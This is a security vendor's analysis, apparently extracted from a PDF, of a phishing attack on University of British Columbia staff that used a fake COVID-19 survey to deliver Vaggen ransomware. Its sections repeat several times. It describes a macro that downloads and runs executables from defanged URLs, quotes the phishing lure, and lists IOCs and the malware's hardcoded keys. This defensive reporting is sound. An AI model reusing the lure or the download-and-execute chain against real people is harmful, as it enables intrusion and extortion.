ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2808 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2809 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2810 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2811 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2812 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2813 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2814 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2815 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2816 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file, since it was shared privately\r\nrather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the shell function to execute killar.exe\r\nChecks the return value of the shell function to determine whether it was successful (the return value is the task ID of the\r\nexecuted application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted about a particular event.\r\nThis can be very useful as an early warning system that an intruder has gained access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2821 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2822 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2823 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2824 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2825 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2826 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2827 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2828 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2829 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2830 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2831 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2832 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2833 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2834 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2835 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2836 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2837 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)
If successful, it sends an HTTP GET request to canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it isn’t successful, it sends an HTTP GET request to canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event. This can be very useful as an early warning notification system that an intruder has had access to a network.
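The check a defender would run on an inbound document for the template injection described above, as an added Go example that is not the post’s code: it opens the OOXML package, reads the attachedTemplate relationship that Word resolves on open, and flags a remote target. The sample document it scans is constructed inside the block with a placeholder host, not the real notabug.org URL.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// RemoteTemplateFinding records one attachedTemplate relationship that points
// outside the document package.
type RemoteTemplateFinding struct {
	ID     string
	Target string
}

// relationships is the subset of the OOXML .rels schema the scanner reads.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// isRemoteTarget treats http(s) URLs and UNC paths as remote. A relative path
// or a file:/// URL to a local template is how a benign document looks.
func isRemoteTarget(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://") ||
		strings.HasPrefix(t, `\\`)
}

// FindRemoteTemplates opens a .docx/.dotm (a ZIP container) and reports every
// attachedTemplate relationship in word/_rels/settings.xml.rels whose target is
// remote, which is the relationship template injection relies on.
func FindRemoteTemplates(doc []byte) ([]RemoteTemplateFinding, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, fmt.Errorf("not a ZIP/OOXML container: %w", err)
	}
	var findings []RemoteTemplateFinding
	for _, f := range zr.File {
		if f.Name != "word/_rels/settings.xml.rels" {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("malformed %s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") && isRemoteTarget(r.Target) {
				findings = append(findings, RemoteTemplateFinding{ID: r.ID, Target: r.Target})
			}
		}
	}
	return findings, nil
}

// BuildSampleDocx assembles a minimal in-memory OOXML package whose settings
// relationships attach the template at templateTarget. It exists only to feed
// the scanner a realistic container; it is a constructed sample, not a real document.
func BuildSampleDocx(templateTarget string) []byte {
	rels := `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` +
		`<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
		`<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" ` +
		`Target="` + templateTarget + `" TargetMode="External"/></Relationships>`
	parts := map[string]string{
		"[Content_Types].xml":          `<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`,
		"word/_rels/settings.xml.rels": rels,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, content := range parts {
		w, _ := zw.Create(name)
		w.Write([]byte(content))
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	// Constructed sample: the remote .dotm sits on a placeholder host, not the real one.
	doc := BuildSampleDocx("https://code-host.example/Word-Templates/raw/master/template.dotm")
	findings, err := FindRemoteTemplates(doc)
	fmt.Println(findings, err)
}
```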
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
